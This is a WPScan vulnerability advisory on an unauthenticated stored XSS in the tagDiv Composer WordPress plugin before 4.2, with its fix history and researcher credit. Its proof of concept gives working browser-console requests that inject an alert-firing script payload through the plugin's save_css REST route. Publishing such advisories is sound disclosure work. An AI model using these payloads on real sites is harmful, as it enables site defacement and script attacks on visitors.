WordPress Plugin Vulnerabilities
tagDiv Composer < 4.2 - Unauthenticated Stored XSS
Description
The plugin, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not have authorisation in a REST route and does not validate as well as escape some parameters when outputting them back, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks.
Note: The issue was partially fixed in 4.1 (still exploitable by Admin+ as only authorisation was added) and fully fixed in 4.2
Proof of Concept
Before 4.1:
1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Run the following code in the browser console while logged out:
fetch( '/wp-json/tdw/save_css', {
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "compiled_css=%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%28%27XSS%2DChecker%27%29%3E%3Cstyle%3E",
method: "POST",
} );
In version 4.1, exploitable by Admin:
1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Log in as an admin, and run the following code in a browser console within WP Admin:
await wp.apiRequest( { path: 'tdw/save_css', type: 'POST', data: { compiled_css: "</style><img src=x onerror=alert('XSS-Checker')><style>" } } );
3. Load a frontend page to see the XSS.
Affects Plugins
Fixed in 4.2 References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Truoc Phan
Submitter
Truoc Phan
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-08-17 (about 8 months ago)
Added
2023-08-17 (about 8 months ago)
Last Updated
2023-09-14 (about 7 months ago)
WPScan 